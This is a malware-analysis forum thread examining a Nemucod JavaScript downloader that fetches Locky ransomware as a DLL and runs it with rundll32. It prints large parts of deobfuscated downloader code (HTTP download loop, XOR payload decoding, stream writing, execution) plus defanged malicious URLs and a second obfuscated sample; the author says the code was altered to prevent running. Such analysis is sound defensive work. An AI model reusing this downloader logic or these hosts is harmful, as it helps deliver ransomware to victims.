Io[5300 - 5087] = 3300 + 6254;
Io[214] = 9555;
Io[215] = 9579;
Io[216] = 9578;
Io[217] = 9496;
Io[218] = 9484;
Io[-1894 + 2113] = 9608;
Io[220] = 9604;
Io[221] = 9612;
Io[222] = 9616;
Io[6075 - 5852] = 9600;
Io[224] = 945;
Io[31 * 7 + 8] = 223;
Io[78 * 2 + 70] = 915;
Io[94 * 2 + 39] = 960;
Io[228] = 931;
Io[229] = 963;
Io[230] = -7149 + 7330;
Io[231] = 964;
Io[232] = 934;
Io[3 * 77 + 2] = 300 * 3 + 20;
Io[234] = 937;
Io[66 * 3 + 37] = 7499 - 6551;
Io[103 * 2 + 30] = 8734;
Io[2060 - 1823] = 966;
Io[238] = 949;
Io[239] = 8745;
Io[240] = 8801;
Io[9305 - 9064] = -8709 + 8886;
Io[242] = 8805;
Io[5598 - 5355] = 15170 - 6366;
Io[-950 + 1194] = 6040 + 2952;
Io[245] = 8993;
Io[7624 - 7378] = 247;
Io[247] = 8776;
Io[-8782 + 9030] = 6192 - 6016;
Io[249] = 8729;
Io[250] = 183;
Io[251] = 4944 + 3786;
Io[252] = 8319;
Io[-3209 + 3462] = 178;
Io[94 * 2 + 66] = 9632;
Io[255] = 160;

var GLq = new Array();
var Gr = "";
var Lj4;
var El;
for (var Lp9 = 0; Lp9 < JEc3[ETi8 + Fp]; Lp9++) {
Lj4 = JEc3[Lp9];
if (Lj4 < (9915 - 9787)) {
El = Lj4;
} else {
El = Io[Lj4];
}
GLq.push(String[GPe8 + NEh0 + St2 + VUe5](El));
}

Gr = GLq[GPy]("");

return Gr;
};

function IGi2(Nq, JEc3) {
var QAl8 = WScript[Cd + Jz + GNu0](Ma7 + Gv7 + NIo1 + YSd7 + Da7 + Sq1);
QAl8[WKs3] = AJf;
QAl8[Lf + XQg1 + Kp] = Hn;
QAl8[Wb]();
QAl8[Py + DLg](Kx1(JEc3));
QAl8[KIy6 + Cz + Gh5](Nq, 2);

QAl8[Ab + TRf]();

};
(Modified to avoid copy-paste => run => infected ! :D)
You can recognize some parts :


https://malwaretips.com/threads/war...downloader-nemucod-july-28.61796/#post-532040


Same general method / functions :rolleyes:

4) Differences :

- New Locky ransomware version delivered as DLL

See @Solarquest thread
Virus Alert - New Locky ransomware version delivered as DLL

- uses the ShortPath Property
=> returns the short path used by programs that require the earlier 8.3 file naming convention.
TEMP%\OOSNSG~1.DLL
Payload obfuscated / deobfuscated :

Sames method / functions used to deobfuscate the payload.

%TEMP%\ooSnsgsGcGgw

=> ooSnsgsGcGgw.dll if well deobfuscated

Example : "C:\Users\DardiM\AppData\Local\Temp\ooSnsgsGcGgw.dll"

With ShortPath Property :

=> TEMP%\OOSNSG~1.DLL
New part (because it uses now a dll) :

if (Vu(SIq + Ex1 + HYu2 + Ht0 + JBs8 + DEa + HSu1).toLowerCase() == "amd64") {
var UFn4 = Xl3.ExpandEnvironmentStrings(NLq);
} else {
var UFn4 = Xl3.ExpandEnvironmentStrings(Mi0);
}

=> looking for the proc architecture to call the right rundll32.exe.

'C:\WINDOWS\SysWOW64\rundll32.exe'
or
"%SystemRoot%\\system32\\rundll32.exe"
used

5) URLs :

hxxp://212.26.129.68/v07t7cb
hxxp://aquatixbottle.com/g40yg2
hxxp://realm-of-rage.heimat.eu/ut1s5
hxxp://essenciadoequilibrio.net/slfhspe
hxxp://sopranolady7.wang/2ictp

6) The payload

New locky version.

run => rundll32.exe %TEMP%\OOSNSG~1.DLL,qwerty 323

Remember : => it uses the short path used by programs that require the earlier 8.3 file naming convention.

%TEMP%\OOSNSG~1.DLL
for
"%TEMP%\ooSnsgsGcGgw.dll"
As seen on my previous analysis about nemucod familly, The payload is obfuscated when downloaded , and the script uses functions to de-cipher / decode (XOR) it and make it a real dangerous file : DLL on this last version.

I can't re explain all the parts done to deobuscate the payload : so I put here the posts, for people that didn't read them (complete explanations, deobfuscated samples, etc)

https://malwaretips.com/threads/new...y-mail-js-trojandownloader-nemucod-ajp.61375/

https://malwaretips.com/threads/war...nt-js-trojandownloader-nemucod-july-28.61796/

https://malwaretips.com/threads/war...downloader-nemucod-july-28.61796/#post-528339

https://malwaretips.com/threads/war...downloader-nemucod-july-28.61796/#post-532040

It looks like the below spoiler, with some other var names
(in red the important modifications, in blue bold : the main loop)
var tab_methods = ["MSXML2.XMLHTTP", "WinHttp.WinHttpRequest.5.1" ];
for (var index =0 ; index < tab_methods.
length; index++) {
try {

var oHttp oHttp = WScript.CreateObject](tab_methods[index]);
break;
} catch (e) {
continue;
}
};

urls_tab = [
"hxxp://212.26.129.68/v07t7cb",
"hxxp://aquatixbottle.com/g40yg2",
"hxxp://realm-of-rage.heimat.eu/ut1s5",
"hxxp://essenciadoequilibrio.net/slfhspe",
"hxxp://sopranolady7.wang/2ictp"

];

var TIk = uheprng(Math.random().toString());
var Lp9 = 1;

do {
var Gr = TIk(urls_tab.length); //
try {

if (1 == Lp9) {
oHttp.open("GET", urls_tab[Gr++ % urls_tab.length], false);
oHttp.send();
}
if (oHttp.readystate < 4) {

WScript.Sleep(0);
continue;
}
var oStream = WScript.CreateObject("ADODB.Stream");
oStream.open();
oStream.type = 1;
oStream.write(oHttp.responseBody);
oStream.position = 0;
oStream.saveToFile(file_path, 2);
oStream.close();
var file_content = ReadTextFromFile_char_substitution_1(file_path);
file_content = deobfuscation(file_content);

if (file_content.length < 100 * 1024 || file_content.length > 230 * 1024 || ! is_real_exe_file(file_content)) {
Lp9 = 1;
continue;
}
try {

WriteTextToFile_char_substitution_2(exe_file_path, file_content);
} catch (e) {
break;
};
oShell.Run(
cmd_command_line + ",querty 323");
break;
} catch (e) {

WScript.Sleep(1000);
continue;
};
} while (Lp9);
WScript.Quit(0);

// Functions used
function uheprng(UFn4) {

return (function() {
var seed = UFn4;
var o = 48,
c = 1,
p = o,
s = new Array(o);
var i, j;
var base64chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
var mash = Mash();
for (i = 0; i < o; i++) s = mash(seed);
mash = null;
var random = function(range) {
return Math.floor(range * (rawprng() + (rawprng() * 0x200000 | 0) * 1.1102230246251565e-16));
}
function rawprng() {

if (++p >= o) p = 0;
var t = (1759680 + 9183) * s[p] + c * 2.3283064365386963e-10;
return s[p] = t - (c = t | (0));
}
return random;
}());
};

function Mash() {

var n = 0xefc8249d;
var mash = function(data) {
if (data) {

data = data.toString();
for (var i = 0; i < data.length; i++) {
n += data.charCodeAt(i);
var h = 0.02519603282416938 * n;
n = h >>> 0;
h -= n;
h *= n;
n = h >>> 0;
h -= n;
n += h * 0x100000000;
}
return (n >>> 0) * 2.3283064365386963e-10;
} else n = 0xefc8249d;
};
return mash;
}

function deobfuscation(file_content) {

var Nf;
var NQf6 = uheprng(
753887);
for (var index = 0; index < file_content.length; index++) {
file_content[index] ^= NQf6(256);
}
var XWe = file_content[file_content.length - 4] | file_content[file_content.length- 3] << 8 | file_content[file_content.length - 2] << 16 | file_content.length - 1] << 24;
file_content.splice(file_content.length - 4, 4);
Nf = 2;
for (var index = 0; index < file_content.length; index++) {

Nf = (Nf + file_content[index]) % 0x100000000;
};
if (Nf != XWe) {

return [];
};
return file_content;
};

function is_real_exe_file(file_content) {

if (file_content[0] == 0x4D && file_content[1] == 0x5a) { //"MZ"
return true;
} else {
return false;
}
};

function ReadTextFromFile_char_substitution_1(file_path) {

var oStream = WScript.CreateObject("ADODB.Stream");
oStream.type = 2;
oStream.Charset = "437;
oStream.open();
oStream.LoadFromFile(file_path);
var file_content = oStream.Readtext;
oStream.close();
return char_substitution_1(file_content);
};

function char_substitution_1(file_content) {
var ELs = new Array();

ELs[199] = 128;
ELs[252] = 129;
...
...
ELs[8319] = 252;
ELs[178] = 253;
ELs[9632] = 254;
ELs[160] = 255;

var file_content = new Array();
for (var index = 0; index < file_content.length; index++) {

var char_code = file_content.CharcodeAt(index);
if (char_code < 128) {
var new_char_code = char_code;
} else {
var new_char_code = ELs[char_code];
}
file_content.push(new_char_code);
};
return file_content;
};

function char_substitution_2(file_content) {

var HFw3 = new Array();
HFw3[128] = 199;
HFw3[129] = 252;
...
...
HFw3[254] = 9632;
HFw3[255] = 160;

var Ww = new Array();
var file_content = "";
var char_code;
var new_char_code;
for (var index = 0; index < file_content.length; index++) {
char_code = file_content[index];
if (char_code < 128) {

new_char_code = char_code;
} else {
new_char_code = HFw3[char_code];
}

Ww.push(String.fromCharCode(new_char_code));
}
file_content = Ww.join("");
return file_content;
};

function WriteTextToFile_char_substitution_2(exe_file_path, file_content) {

var oStream = WScript.CreateObject("ADODB.Stream");
oStream.type = 2;
oStream.Charset= "437" ;
oStream.open();
oStream.WriteText(char_substitution_2(file_content));
oStream.SaveToFile(exe_file_path, 2);
oStream.close();
};
https://malwaretips.com/threads/war...downloader-nemucod-july-28.61796/#post-528138
and all posts below, in the above link
 
Last edited:

SHvFl

Level 35
Verified
Honorary Member
Top Poster
Content Creator
Well-known
Nov 19, 2014
2,342
Lol i get such mails all the time on one of my emails. The benefit of having old account with some history behind it.
I am amazed people actually open random crap they send them tbh which i assume they do or else malware people would stop mass emailing.

Thanks for the analysis buddy.
 

Exterminator

Community Manager
Verified
Staff Member
Well-known
Oct 23, 2012
12,527
Please we can do without stuff containing foul language.
The rules forbidding the use of foul language apply to everybody as well as everything and anything posted in the forum.
This includes quoted text,videos,images and articles.
Thanks :)

*This is in reference to a deleted post that contained an example with extremely foul language.
 
Last edited:

DardiM

Level 26
Thread author
Verified
Honorary Member
Top Poster
Malware Hunter
Well-known
May 14, 2016
1,597
Please we can do without stuff containing foul language.
The rules forbidding the use of foul language apply to everybody as well as everything and anything posted in the forum.
Thanks :)
Sorry :)

Lol i get such mails all the time on one of my emails. The benefit of having old account with some history behind it.
I am amazed people actually open random crap they send them tbh which i assume they do or else malware people would stop mass emailing.

Thanks for the analysis buddy.

In less than 7 days :

- Attached is the list of old office facilities that need to be replaced. Please copy the list into the purchase order form.

- Here is the travel expense sheet for your upcoming company field trip. Please write down the approximate costs in the attachment.


- Attached is the bank transactions made from the company during last month.

- Please file these transactions into financial record.

- Please sign the attached purchase of the office equipment. We will send you back the receipt afterward.

- Hello, as you requested, attached is the paycheck for your next months salary in advance.
=> my favourite :rolleyes:


Here is the soft post :)

A sample I received, that is similar to analyzed sample in this thread, but with a big insult I replaced by shutBIG_INSULT_INSIDE

function d(){
var _wds = "W"+"S"+"c"+"r"+"ipt";
var _c = "\%S"+"y"+"st"+"em"+"Root\%\\system32\\cmd."+"ex"+"e";
var _zds = this[_wds]["C"+"re"+"ateObject"](_wds+".Shell");
var se = _zds["E"+"n"+"vi"+"ronmen"+"t"]("S"+"Y"+"S"+"T"+"EM");
var _dd = se("Co"+"mS"+"pe"+"c");
if (_dd == _c) {return 1;}

else {WScript["Q"+"u"+"it"](1);};
}
d();

var As2 = "LbshutBIG_INSULT_INSIDERfshutBIG_INSULT_INSIDENEbshutBIG_INSULT_INSIDEHOx7shutBIG_INSULT_INSIDECk3shutBIG_INSULT_INSIDEUHoshutBIG_INSULT_INSIDESwshutBIG_INSULT_INSIDENEbshutBIG_INSULT_INSIDEXlshutBIG_INSULT_INSIDELYk5shutBIG_INSULT_INSIDEIJdshutBIG_INSULT_INSIDEYi6shutBIG_INSULT_INSIDEFwshutBIG_INSULT_INSIDENcshutBIG_INSULT_INSIDEXlshutBIG_INSULT_INSIDEXlshutBIG_INSULT_INSIDEXlshutBIG_INSULT_INSIDEXlshutBIG_INSULT_INSIDEBZbshutBIG_INSULT_INSIDEVdshutBIG_INSULT_INSIDEPj2shutBIG_INSULT_INSIDEXlshutBIG_INSULT_INSIDENgshutBIG_INSULT_INSIDEAPzshutBIG_INSULT_INSIDELYk5shutBIG_INSULT_INSIDENsshutBIG_INSULT_INSIDEXlshutBIG_INSULT_INSIDETx7shutBIG_INSULT_INSIDEXlshutBIG_INSULT_INSIDELeshutBIG_INSULT_INSIDEBDx7shutBIG_INSULT_INSIDELeshutBIG_INSULT_INSIDEZh4shutBIG_INSULT_INSIDELeshutBIG_INSULT_INSIDENVmshutBIG_INSULT_INSIDELeshutBIG_INSULT_INSIDEZh4shutBIG_INSULT_INSIDELeshutBIG_INSULT_INSIDEHOx7shutBIG_INSULT_INSIDELeshutBIG_INSULT_INSIDEZh4shutBIG_INSULT_INSIDELeshutBIG_INSULT_INSIDEPj2shutBIG_INSULT_INSIDELeshutBIG_INSULT_INSIDEZh4shutBIG_INSULT_INSIDELeshutBIG_INSULT_INSIDEUHoshutBIG_INSULT_INSIDEGNp9shutBIG_INSULT_INSIDECk3shutBIG_INSULT_INSIDELeshutBIG_INSULT_INSIDERushutBIG_INSULT_INSIDENcshutBIG_INSULT_INSIDEXlshutBIG_INSULT_INSIDEXlshutBIG_INSULT_INSIDE
...
...
...
".split("shutBIG_INSULT_INSIDE");

var As2
is similar to the first tab chars we have seen in first post, and the .split function remove the insult part

It also uses a second tab of chars to replace the "hidden" chars" of first tab :

var Tr0 = {"Nc": "\x0a", "UXg3": "\x0d", "OEq": "D", "Ug6": "H", "Jg9": "L", "Ii": "P", "Ap": "T", "ASy5": "X", "Nl2": "\x09", "LYk5": "d", "Mu8": "h", "Ly": "l", "GNp9": "p", "Ck3": "t", "Ue": "\x7d", "Qs": "\x7c", "Fw": "\x7b", "Pw2": "\x2f", "MQl": "\x2d", "Qf2": "\x2e", "Zh4": "\x2b", "Gu3": "\x2c", "Bi": "\x2a", "KVj7": "C", "DLr7": "G", "Qd0": "K", "Cx": "O", "NYt": "\x26", "NVm": "S", "XOq0": "\x25", "Le": "\x22", "Xl": "\x20", "PYc": "x", "IJd": "\x28", "Yi6": "\x29", "HOx7": "c", "Ja2": "g", "XBh": "k", "Sw": "o", "Ns": "s", "APz": "w", "BDx7": "W", "SJj": "\x21", "Zt": "\x31", "GRc7": "\x30", "QIb": "\x33", "GXo7": "\x32", "FCw": "\x35", "XEp": "\x34", "DBa4": "\x37", "Pr": "\x36", "Kj": "\x39", "Rn": "\x38", "Le6": "\x3a", "LAo4": "\x3c", "Ru": "\x3b", "Qp7": "\x3e", "Tx7": "\x3d", "Gc": "F", "Hv0": "J", "Jj": "N", "Ib3": "R", "Dt1": "V", "OEi": "Z", "YZc": "b", "Lb": "f", "Dy2": "j", "NEb": "n", "Pj2": "r", "BZb": "v", "Pt": "z", "Fk": "B", "Rf": "u", "Op": "A", "DRu": "E", "So2": "I", "TOy": "M", "XGx6": "Q", "Ee": "U", "ZVy": "Y", "Vd": "a", "No": "e", "UHo": "i", "Fv3": "m", "Og": "q", "Ng": "\x5f", "Ue0": "\x5e", "MHz2": "\x5d", "Ji7": "\x5c", "XDq": "\x5b", "Ya2": "y"};
var Fv;
for (Fv in As2)
{
BIz = BIz + Tr0[As2[Fv]];
}
eval(BIz);


=> Blz will contain the code after first deobuscation step.

For the other part : like the sample analyzed in this thread, with more "tricks" to obfuscate a bit more some parts (for example the XOR part)

URLs :

http: //virmalw.name/2lbbr
http: //www .vissershuisje-bredene.be/fisg4
http: //www .mediawareonline.it/ediuv66v
http: //foodbiz-net.com/82zppv
http: //www .smoes.net/vrjhlrj7​

Payload :

GKmJaoh4VHxYOk.dll



N.B. : The script maker has a bad vocabulary :D
 
Last edited:

About us

  • MalwareTips is a community-driven platform providing the latest information and resources on malware and cyber threats. Our team of experienced professionals and passionate volunteers work to keep the internet safe and secure. We provide accurate, up-to-date information and strive to build a strong and supportive community dedicated to cybersecurity.

User Menu

Follow us

Follow us on Facebook or Twitter to know first about the latest cybersecurity incidents and malware threats.

Top